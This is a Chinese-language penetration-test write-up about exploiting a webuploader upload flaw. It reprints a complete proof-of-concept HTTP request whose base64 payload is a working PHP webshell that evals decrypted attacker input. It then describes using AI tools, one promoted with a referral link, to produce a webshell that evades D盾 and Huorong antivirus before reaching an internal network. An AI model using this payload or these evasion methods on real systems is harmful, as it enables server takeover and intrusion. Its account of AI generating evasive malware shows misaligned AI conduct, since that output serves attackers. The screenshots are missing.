记一次渗透测试的实操

华盟原创文章投稿奖励计划

在一次渗透测试过程中,发现了一个存在 webuploader 漏洞的网站,其漏洞利用的 POC如下:

POST //statics/admin/webuploader/0.1.5/server/preview.php HTTP/2Host: xxx.xxx.xxx.xxxUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 746data:image/php;base64,PD9waHAKQGVycm9yX3JlcG9ydGluZygwKTsKc2Vzc2lvbl9zdGFydCgpOwogICAgJGtleT0iZTQ1ZTMyOWZlYjVkOTI1YiI7IAoJJF9TRVNTSU9OWydrJ109JGtleTsKCSRwb3N0PWZpbGVfZ2V0X2NvbnRlbnRzKCJwaHA6Ly9pbnB1dCIpOwoJaWYoIWV4dGVuc2lvbl9sb2FkZWQoJ29wZW5zc2wnKSkKCXsKCQkkdD0iYmFzZTY0XyIuImRlY29kZSI7CgkJJHBvc3Q9JHQoJHBvc3QuIiIpOwoJCQoJCWZvcigkaT0wOyRpPHN0cmxlbigkcG9zdCk7JGkrKykgewogICAgCQkJICRwb3N0WyRpXSA9ICRwb3N0WyRpXV4ka2V5WyRpKzEmMTVdOyAKICAgIAkJCX0KCX0KCWVsc2UKCXsKCQkkcG9zdD1vcGVuc3NsX2RlY3J5cHQoJHBvc3QsICJBRVMxMjgiLCAka2V5KTsKCX0KICAgICRhcnI9ZXhwbG9kZSgnfCcsJHBvc3QpOwogICAgJGZ1bmM9JGFyclswXTsKICAgICRwYXJhbXM9JGFyclsxXTsKCWNsYXNzIEN7cHVibGljIGZ1bmN0aW9uIF9faW52b2tlKCRwKSB7ZXZhbCgkcC4iIik7fX0KICAgIEBjYWxsX3VzZXJfZnVuYyhuZXcgQygpLCRwYXJhbXMpOwo/Pg==

然而,服务器中安装了D盾,上传的WebShell直接被拦截。尝试使用豆包生成WebShell,但未能成功。

自动草稿


使用无问AI进行Webshell

自动草稿


在本地下载最新版 D 盾对生成的 WebShell 进行检测时,发现 D 盾提示存在变量函数。

自动草稿

借助 AI 进行绕过尝试

自动草稿

最终得到了一个提示级别为 1 的 WebShell。这个 WebShell,D 盾仅提示为可疑文件,并且经过测试还可以绕过火绒检测

自动草稿自动草稿自动草稿

成功连接进入内网

自动草稿

无问AI注册链接

http://www.wwlib.cn/index.php/login/icode/3643b04df7cc00dc

文章来源:小白安全工具

黑白之道发布、转载的文章中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途及盈利等目的,否则后果自行承担!

如侵权请私聊我们删文


END

本文来源小白安全工具,经授权后由华盟君发布,观点不代表华盟网的立场,转载请联系原作者。

发表回复